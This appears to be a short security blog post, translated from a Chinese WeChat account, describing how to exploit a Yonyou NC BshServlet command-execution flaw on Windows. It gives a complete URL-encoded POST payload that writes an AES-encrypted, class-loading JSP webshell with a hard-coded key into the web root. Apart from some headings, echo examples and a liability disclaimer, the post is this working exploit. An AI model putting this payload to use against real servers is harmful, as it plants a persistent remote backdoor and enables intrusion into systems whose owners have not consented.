0x00 Preface / Introduction
0x01 Small tips for writing the shell
0x02 The most important part: the POST packet
0x03 Automating the exploit (EXP)
0x04 Summary
After slacking off for quite a while, I finally managed to write the shell successfully, which means a usable Windows Echo Shell EXP can now be produced.
exec(cmd /c echo "shell-code" > shell.jsp);
shell.jsp content: "shell-code"
exec(cmd /c echo ">shell-code<" > shell.jsp);
shell.jsp content: ">shell-code<"
"bsh.script=exec%28%22cmd+%2Fc+echo+%5C%22%3E%3C%25%40page+import%3D%5C%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%5C%22%25%3E%3C%25%21class+U+extends+ClassLoader%7BU%28ClassLoader+c%29%7Bsuper%28c%29%3B%7Dpublic+Class+g%28byte+%5B%5Db%29%7Breturn+super.defineClass%28b%2C0%2Cb.length%29%3B%7D%7D%25%3E%3C%25if+%28request.getMethod%28%29.equals%28%5C%22POST%5C%22%29%29%7BString+k%3D%5C%22e45e329feb5d925b%5C%22%3Bsession.putValue%28%5C%22u%5C%22%2Ck%29%3BCipher+c%3DCipher.getInstance%28%5C%22AES%5C%22%29%3Bc.init%282%2Cnew+SecretKeySpec%28k.getBytes%28%29%2C%5C%22AES%5C%22%29%29%3Bnew+U%28this.getClass%28%29.getClassLoader%28%29%29.g%28c.doFinal%28new+sun.misc.BASE64Decoder%28%29.decodeBuffer%28request.getReader%28%29.readLine%28%29%29%29%29.newInstance%28%29.equals%28pageContext%29%3B%7D%25%3E%3C%5C%22+%3E+webapps%2Fnc_web%2Fshell.jsp%22%29%3B%0D%0A%0D%0A%0D%0A"
This article was first published on the WeChat public account (NOVASEC): Yonyou NC BshServlet Echo Shell Tips and EXP on Windows
Disclaimer: The programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching purposes. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. For any questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not blocked; contact details are on the home page).